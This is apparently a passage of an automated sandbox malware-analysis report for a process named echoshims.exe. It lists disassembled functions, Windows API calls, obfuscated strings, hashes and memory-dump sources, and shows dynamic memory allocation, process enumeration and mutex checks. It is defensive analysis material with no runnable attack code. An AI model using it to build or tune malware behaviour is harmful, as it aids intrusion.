Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ecf71ab9bc0c7ee8e0dec2311f3c5cce809bdd21dd83d7ef32c2f13daacf2180
Instruction ID: 737496e09bf02824ed8e7580db0255695749b735f25ed693b6f1a9801ff438da
Opcode Fuzzy Hash: ecf71ab9bc0c7ee8e0dec2311f3c5cce809bdd21dd83d7ef32c2f13daacf2180
Instruction Fuzzy Hash: 833130B2E20B82E7E3058F64D805BA5B770FBEA300F205356E4D595642EB78A6A5C7D0

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: echoshims.exe PID: 3712 Parent PID: 404echoshims.exeUNIQUE

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.1%
Total number of Nodes:	484
Total number of Limit Nodes:	6

Executed Functions

Function 00181FF0, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 0018202E
NtAllocateVirtualMemory.NTDLL ref: 001820B5

Strings

Z, xrefs: 00182061
l, xrefs: 00182075
w, xrefs: 00182065
A, xrefs: 00182069
l, xrefs: 00182071
l, xrefs: 0018206D
r, xrefs: 00182055
y, xrefs: 00182059
YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 0018201B

Memory Dump Source

Source File: 00000014.00000002.1065303839.00180000.00000040.sdmp, Offset: 00180000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_180000_echoshims.jbxd

Similarity

API ID: AllocateMemoryVirtualmemcpy
String ID: A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2505947351-868024915
Opcode ID: 866b05b6a4d0da3dc772e175bf916dd71db52c5f9175a2b4d1ed80ea80aa0bd2
Instruction ID: ee7b110bbc5f0b14e33752534c246b1716a244d209ef2ef29dede4acd3c5c591
Opcode Fuzzy Hash: 866b05b6a4d0da3dc772e175bf916dd71db52c5f9175a2b4d1ed80ea80aa0bd2
Instruction Fuzzy Hash: 0F3127B0D04348CBDB10DFA8D44468DBFB1AF89314F24C19DD858AB342C776994ACF91

Uniqueness

Uniqueness Score: 100.00%

Function 00181EE0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 73
nativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 00181F41
NtProtectVirtualMemory.NTDLL ref: 00181FC0

Strings

yyProtectairtual emory, xrefs: 00181F03
@, xrefs: 00181F56
w, xrefs: 00181F67
V, xrefs: 00181F6B
M, xrefs: 00181F6F
Z, xrefs: 00181F63

Memory Dump Source

Source File: 00000014.00000002.1065303839.00180000.00000040.sdmp, Offset: 00180000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_180000_echoshims.jbxd

Similarity

API ID: MemoryProtectVirtualmemcpy
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2440499307-3039725267
Opcode ID: 9d0d91410a6054ecfab841e14a683aa0fa3beee0583d45c12d948adb94b644ce
Instruction ID: 274c048403ab60d85b89bf78e576a96b075b656c79b37590bb5b745899bf3daa
Opcode Fuzzy Hash: 9d0d91410a6054ecfab841e14a683aa0fa3beee0583d45c12d948adb94b644ce
Instruction Fuzzy Hash: 0D31F1B5D042188FDB10DF69C880B9DBBF4BB48304F2085AEE86CAB342D7359A46CF51

Uniqueness

Uniqueness Score: 100.00%

Function 005411CD, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 005411CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 005411F1
CloseHandle.KERNEL32(?), ref: 005411FA
CloseHandle.KERNEL32(?), ref: 00541203
CloseHandle.KERNEL32 ref: 0054120A
CloseHandle.KERNEL32 ref: 00541211

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 5cc0a9f60e774ddf22a768193b0cdec2673892cfdc6fd91636ea74dea6b5bd3e
Instruction ID: db35d3bd08d3401a2a4e4bf49a8b0b88651af79a0585e4fce90296f24fb44f26
Opcode Fuzzy Hash: 5cc0a9f60e774ddf22a768193b0cdec2673892cfdc6fd91636ea74dea6b5bd3e
Instruction Fuzzy Hash: 5AE06D36610215ABCB015BA0ED1D9ED7B79FF6971BF0002A1F60AD01E0DB21599AFFA1

Uniqueness

Uniqueness Score: 0.01%

Function 0054103C, Relevance: 7.5, APIs: 5, Instructions: 46
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00541043
_snwprintf.NTDLL ref: 0054107F
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00541099
GetLastError.KERNEL32 ref: 005410A5
CloseHandle.KERNEL32(00000000), ref: 00541111

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess_snwprintf
String ID:
API String ID: 670123879-0
Opcode ID: e787c61c31aebf96fc195813c81213461aa22372124bcc554e2b65ead1215e09
Instruction ID: 70dd37cb820e3f5fee8e68b146b28b68dfb0cec18a53340cfb21ad87424eea64
Opcode Fuzzy Hash: e787c61c31aebf96fc195813c81213461aa22372124bcc554e2b65ead1215e09
Instruction Fuzzy Hash: 5F014771A0060597DB50DBA0EC5D7EE7F76FB9434AF0005A1E609D3140EF304EC89B96

Uniqueness

Uniqueness Score: 0.01%

Function 00542031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00542055
CloseHandle.KERNEL32(?), ref: 0054207C
CloseHandle.KERNEL32(?), ref: 00542085

Strings

D, xrefs: 00542039

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 1916c37643c5e54d1dd8814d3155e379cca5ca24b1fcdf98669a9f8f3832ab54
Instruction ID: 0705f800a38f5252aa585394f3362ef7900d78909c2e35026bcaf46e806e982c
Opcode Fuzzy Hash: 1916c37643c5e54d1dd8814d3155e379cca5ca24b1fcdf98669a9f8f3832ab54
Instruction Fuzzy Hash: 33F09031A50319ABEB214F94DC09BEE7BB8FB49705F100251FA08A91D0DBB29590DB54

Uniqueness

Uniqueness Score: 0.01%

Function 001822CE, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 22
stringCOMMON

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 001822FB

Strings

_E9e3X1YKeRS, xrefs: 001822E2
ov8oTdn, xrefs: 001822E9

Memory Dump Source

Source File: 00000014.00000002.1065303839.00180000.00000040.sdmp, Offset: 00180000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_180000_echoshims.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: 0d29b07f97e4f8735f9df6bb97d17d7357383b2543995568f5d4b43f8b9e596e
Instruction ID: f535623ebfc0f6ba08c81954895285dd09fa2b82ba083fc86005c29f1352b1dc
Opcode Fuzzy Hash: 0d29b07f97e4f8735f9df6bb97d17d7357383b2543995568f5d4b43f8b9e596e
Instruction Fuzzy Hash: 6EE09AB0A102008BCB15EF78EE492187BF0F756704F00806AD8099B360DB306BDACFA2

Uniqueness

Uniqueness Score: 0.23%

Function 0054112E, Relevance: 3.0, APIs: 2, Instructions: 28
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 00541145
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00541160

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: ff83fa97be685f2d47fd6ef00292fe699a2fde68cc821d7212cc0c1ad51f3748
Instruction ID: f632f4a97dc00ef0b31b44c430bf65696891ab0b10241b64b3edc1f3b9513592
Opcode Fuzzy Hash: ff83fa97be685f2d47fd6ef00292fe699a2fde68cc821d7212cc0c1ad51f3748
Instruction Fuzzy Hash: F5E068B6B0061853DB2096E5AC4EBDE3B68FB80316F0000B1FB09D3181EA618D844BE5

Uniqueness

Uniqueness Score: 0.01%

Function 00541C27, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 00541C33
CloseHandle.KERNEL32 ref: 00541C71

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: 2ee1b9d9fd2feacf441e20b6a85492d36ca8b6423241e240fe846c04f03f7775
Instruction ID: 97fd1f492783d1bde8b0d619f5551942208edb5fcd99ebd0b3d4af1c388ac14a
Opcode Fuzzy Hash: 2ee1b9d9fd2feacf441e20b6a85492d36ca8b6423241e240fe846c04f03f7775
Instruction Fuzzy Hash: 1BC08C70012A11EFE7102FB1BC0C6AF3E38FF1A30AB204080E40390080CB344E86AEAA

Uniqueness

Uniqueness Score: 0.01%

Function 00541C58, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 00541C58
CloseHandle.KERNEL32 ref: 00541C71

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: 0ea353fe97e460f0795755efab38cd6ca726449e2e8f9e68f0d402071f9276eb
Instruction ID: 0d7182d8725223bd6469c66538a641bbd0e35200ee5f49e8837c70d7c8815bbb
Opcode Fuzzy Hash: 0ea353fe97e460f0795755efab38cd6ca726449e2e8f9e68f0d402071f9276eb
Instruction Fuzzy Hash: 8AB09230154A01C6A2181B61AC1C16A2F64F92674A3101505A00381090EB209A85BE1A

Uniqueness

Uniqueness Score: 0.01%

Function 0054F290, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 0054F2B0

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d000ea9526048cef9d69ea4b604614e600f162535b43ae743232a8e8ac45b857
Instruction ID: 72b35cefd7cd0fded57db2519fdce5f09c95753b7cea3e7fd4d6e447f3f3db21
Opcode Fuzzy Hash: d000ea9526048cef9d69ea4b604614e600f162535b43ae743232a8e8ac45b857
Instruction Fuzzy Hash: D5C08C30225B0602D61433F90C0F7CD3C18BF8135DF000220BD64800C2FEA0B481907B

Uniqueness

Uniqueness Score: 0.01%

Function 00541C10, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00541C14

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: d60af6dd4369d8707bb7ff7abf5272635bea26b9a97e762efc98411bde428c94
Instruction ID: cc2cc613eb106f8502e2dedd38c82f71914b3922d4d4eecbd998861ad5cea984
Opcode Fuzzy Hash: d60af6dd4369d8707bb7ff7abf5272635bea26b9a97e762efc98411bde428c94
Instruction Fuzzy Hash: 32B09232544A208787382638688C4695890266A33A32A1B228E7B932E0BA608C86A845

Uniqueness

Uniqueness Score: 0.01%

Non-executed Functions

Function 005456EF, Relevance: .5, Instructions: 487COMMON

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533d3e4276c7b67fcfedb57237d09b840b2abb8c83896f2338f8ac3dca67cacc
Instruction ID: 331fe3413f98287973742d684a5c081a654e6aaa9b4b6832f9e2890938a7b12e
Opcode Fuzzy Hash: 533d3e4276c7b67fcfedb57237d09b840b2abb8c83896f2338f8ac3dca67cacc
Instruction Fuzzy Hash: F9129F71E00A2ACBCF08CF69C8902FDBFB1FF45308F24456AD866A7745E6349A41DB95

Uniqueness

Uniqueness Score: 0.00%

Function 00541530, Relevance: .0, Instructions: 19COMMON

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3b20853c12e01583646f0bc9b5b796af15d36b12eeb5013d60b718caa977e6
Instruction ID: 86d7599a3c4d5eebd0459729b29339bf0105b0e5c3b87625ab1720d477b02ab9
Opcode Fuzzy Hash: fb3b20853c12e01583646f0bc9b5b796af15d36b12eeb5013d60b718caa977e6
Instruction Fuzzy Hash: 48E01232550850DBD7319A48C894AEAFBAAFFC47A476A085AD55A67601C274BC808A54

Uniqueness

Uniqueness Score: 0.00%

Function 005421B0, Relevance: .0, Instructions: 3COMMON

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00

Uniqueness

Uniqueness Score: 0.00%

Function 0054814A, Relevance: 42.5, APIs: 1, Strings: 23, Instructions: 464libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00549248

Strings

`h, xrefs: 00548550
x, xrefs: 00548B18
-v8W, xrefs: 005484BA
\Oh, xrefs: 005486F4
I5OD, xrefs: 00548B68
FKx|, xrefs: 00548E42
p3U, xrefs: 00549126
id]], xrefs: 005486E0
)c=, xrefs: 005488DE
TyFi, xrefs: 00548212
= L-, xrefs: 00548500
2Hl9, xrefs: 005490D6
GQ:, xrefs: 00548460
SD`, xrefs: 00548FAA
;X~, xrefs: 00548A00
}#y, xrefs: 005490C2
]7, xrefs: 00548F8C
v9C, xrefs: 00548F64
+?5, xrefs: 00549195
vrSw, xrefs: 00548B2C
`[3f, xrefs: 005485F0
', xrefs: 0054833E
9N, xrefs: 00548726

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: }#y$ +?5$)c=$-v8W$2Hl9$;X~$= L-$FKx|$GQ:$I5OD$SD`$TyFi$\Oh$`[3f$id]]$p3U$vrSw$v9C$'$9N$`h$]7$x
API String ID: 1029625771-2556820308
Opcode ID: fb857e914b1cf18796c3fcf3cc428d8637c5384980f0c08e2938778a854908b7
Instruction ID: 9436d5c9d50d8e60dad90b39f645ee86ca20abf0b76b45cb344000d22a382be4
Opcode Fuzzy Hash: fb857e914b1cf18796c3fcf3cc428d8637c5384980f0c08e2938778a854908b7
Instruction Fuzzy Hash: DB82A4F48567A98FDB619F429E857CEBA31BB51305F5082C8C19D3B215CB720B86CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0054A78A, Relevance: 40.7, APIs: 1, Strings: 22, Instructions: 474libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0054B8EC

Strings

7k/, xrefs: 0054B69E
' #C, xrefs: 0054AE38
RN5`, xrefs: 0054AB90
WfP=, xrefs: 0054AF3C
\1>, xrefs: 0054A7A8
7K3, xrefs: 0054B720
)jt@, xrefs: 0054B7ED
%h(, xrefs: 0054B068
^a, xrefs: 0054AE7E
H D%, xrefs: 0054B55E
D=z, xrefs: 0054B5D6
@3U, xrefs: 0054B766
=z4, xrefs: 0054B45A
/g=, xrefs: 0054A9BA
7, xrefs: 0054B388
:X<, xrefs: 0054B878
/Z7~, xrefs: 0054ACEE
S1p, xrefs: 0054AA96
eJn}, xrefs: 0054B568
B"* , xrefs: 0054B374
ML-', xrefs: 0054B4B4
.ZI, xrefs: 0054AC4E

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: .ZI$\1>$' #C$)jt@$/Z7~$7$7k/$:X<$=z4$@3U$B"* $D=z$H D%$ML-'$RN5`$S1p$WfP=$eJn}$%h($/g=$7K3$^a
API String ID: 1029625771-3694993786
Opcode ID: ff47171eb8a6f13454222bd619f0b02c171cbc951b81329233176d8aa316280a
Instruction ID: 31efbe157873480a39b1a32a64965308a85d9414a5b69fd19ee83b267c1980fe
Opcode Fuzzy Hash: ff47171eb8a6f13454222bd619f0b02c171cbc951b81329233176d8aa316280a
Instruction Fuzzy Hash: DA82A6F48167698BDB71DF429E8578EBA31BB51305F6086C8C19D3B214CB720B96CF89

Uniqueness

Uniqueness Score: 100.00%

Function 005472DA, Relevance: 30.0, APIs: 1, Strings: 16, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00547C1C

Strings

/d4, xrefs: 00547B04
tcZ], xrefs: 0054769A
$w 4, xrefs: 00547A64
e, xrefs: 00547B3E
~o>, xrefs: 0054794C
F2`?, xrefs: 00547BD1
'/~, xrefs: 0054744C
"C#}, xrefs: 005479EC
3@[, xrefs: 00547A32
/@n, xrefs: 00547A28
d;, xrefs: 005477BC
9I;\, xrefs: 00547820
LP 3, xrefs: 005478DE
P&U, xrefs: 00547C05
JIx, xrefs: 0054756E
wk#m, xrefs: 005475D2

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: "C#}$$w 4$/@n$/d4$3@[$9I;\$F2`?$JIx$LP 3$P&U$tcZ]$wk#m$~o>$d;$'/~$e
API String ID: 1029625771-1816423517
Opcode ID: acee2f096b83673cd40cc4503f0cba9faca10a0066e58c18eb5f7cfb5c41cbd2
Instruction ID: da273b079e4bc5fe1f26479ffcbb8856fdb1f3e08c280c3f0b05e6bc906bbfbb
Opcode Fuzzy Hash: acee2f096b83673cd40cc4503f0cba9faca10a0066e58c18eb5f7cfb5c41cbd2
Instruction Fuzzy Hash: 2512A7B48463698FDB71DF829A897CDBA74BB12744F6086C8C19D3B214CB750B86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 0054C4A2, Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 188libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0054CAD8

Strings

M{%, xrefs: 0054CAAA
3|G, xrefs: 0054C9B1
+, xrefs: 0054C8F8
"qZ, xrefs: 0054C8A8
5qP, xrefs: 0054C943
yR O, xrefs: 0054CA25
?z=B, xrefs: 0054CA33
y{-, xrefs: 0054C5D8
Rh<R, xrefs: 0054C5E2
"RD, xrefs: 0054CAA3
D 0, xrefs: 0054C524
P0U, xrefs: 0054C916

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: "RD$"qZ$+$3|G$5qP$?z=B$D 0$M{%$P0U$Rh<R$yR O$y{-
API String ID: 1029625771-2288729338
Opcode ID: 24cff167edc6ba51db93810c71fac8ba52786375b1aec08423d0ba3c217f76c5
Instruction ID: d9431c9ff76742174be3ca8d7b962837b08365ef7cef10a2fed52e1924f46ee6
Opcode Fuzzy Hash: 24cff167edc6ba51db93810c71fac8ba52786375b1aec08423d0ba3c217f76c5
Instruction Fuzzy Hash: 87E198B4846369CBDB60DF829A997CDBA70FB55304F6086C8C1AD3B314DB750A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00549C2A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 312libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0054A738

Strings

B, xrefs: 0054A35A
`(U, xrefs: 0054A5B2
2Cu, xrefs: 0054A5D5
*8c=, xrefs: 0054A27E
"GT+, xrefs: 00549D42
f,Ee, xrefs: 00549CA2
}W@, xrefs: 0054A662
;T{, xrefs: 0054A38C
bYT@, xrefs: 00549CAC
8q#V, xrefs: 00549ED2
3:, xrefs: 0054A6D2

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: ;T{$"GT+$*8c=$3:$8q#V$B$`(U$bYT@$f,Ee$}W@$2Cu
API String ID: 1029625771-2192156477
Opcode ID: a4b59e28ff602278f486287ec91525520e88ab56f07534e1cf8fadce4f3c00f4
Instruction ID: fe184738334267a83c4c9d744f8c8c5aa3064d225e510253653a2d767fa24400
Opcode Fuzzy Hash: a4b59e28ff602278f486287ec91525520e88ab56f07534e1cf8fadce4f3c00f4
Instruction Fuzzy Hash: 8932B6F4C163698BEB61DF429A887CCBB74FB01704F6096C8D1683A225CB754B85CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0054929A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00549BDC

Strings

7cn@, xrefs: 00549A56
=WB, xrefs: 00549B67
OI5, xrefs: 00549BCA
XX, xrefs: 005499F2
z9, xrefs: 0054954C
[aY<, xrefs: 00549B13
,M[, xrefs: 005494FC
h , xrefs: 00549A06
?/&9, xrefs: 00549858
0E_, xrefs: 00549452
Jg, xrefs: 005496B4

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: ,M[$0E_$7cn@$?/&9$OI5$[aY<$h $=WB$Jg$XX$z9
API String ID: 1029625771-656464786
Opcode ID: bcc48bf17a36005c96143453fec14fa6f7e1db81268661febb393f24894ff5b8
Instruction ID: 49c86020efbac0b7eec903965af641508813bf315d3fadb18eff4616f9a0627f
Opcode Fuzzy Hash: bcc48bf17a36005c96143453fec14fa6f7e1db81268661febb393f24894ff5b8
Instruction Fuzzy Hash: 7612C5B4C563A98BDB61DF829A897CCBB74BB05304F6096C8D1593B214CB750BC6CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00546E3A, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 140libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00547290

Strings

V6'J, xrefs: 00547254
D, xrefs: 00546E6C
?&8, xrefs: 00546EE4
yfH, xrefs: 005471E4
p/U, xrefs: 0054716E

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: ?&8$V6'J$p/U$yfH$D
API String ID: 1029625771-1048631645
Opcode ID: 6ed387f7a2dc2bc692fa3c0285956fca81175658e4a9f5136d6d573f86949879
Instruction ID: c1efbd174afd6b757b5226d081abc26c3618502d15270b1f4b03358044504a19
Opcode Fuzzy Hash: 6ed387f7a2dc2bc692fa3c0285956fca81175658e4a9f5136d6d573f86949879
Instruction Fuzzy Hash: 50A1B7B4C4936C8FEB608F81AA957CDBB70FB16344F6086C8C5693B614CB750A86CF95

Uniqueness

Uniqueness Score: 100.00%

Function 0054CE91, Relevance: 10.6, APIs: 7, Instructions: 93COMMON

APIs

GetTickCount.KERNEL32 ref: 0054CE9E
SetEvent.KERNEL32 ref: 0054CFF1

Part of subcall function 0054FAE0: lstrcmpiW.KERNEL32(00557950,00557540,?,0054CEE7), ref: 0054FB13

GetTickCount.KERNEL32 ref: 0054CEEB
GetTickCount.KERNEL32 ref: 0054CEFC
GetTickCount.KERNEL32 ref: 0054CF8D
GetTickCount.KERNEL32 ref: 0054CF9E
GetTickCount.KERNEL32 ref: 0054CFC8

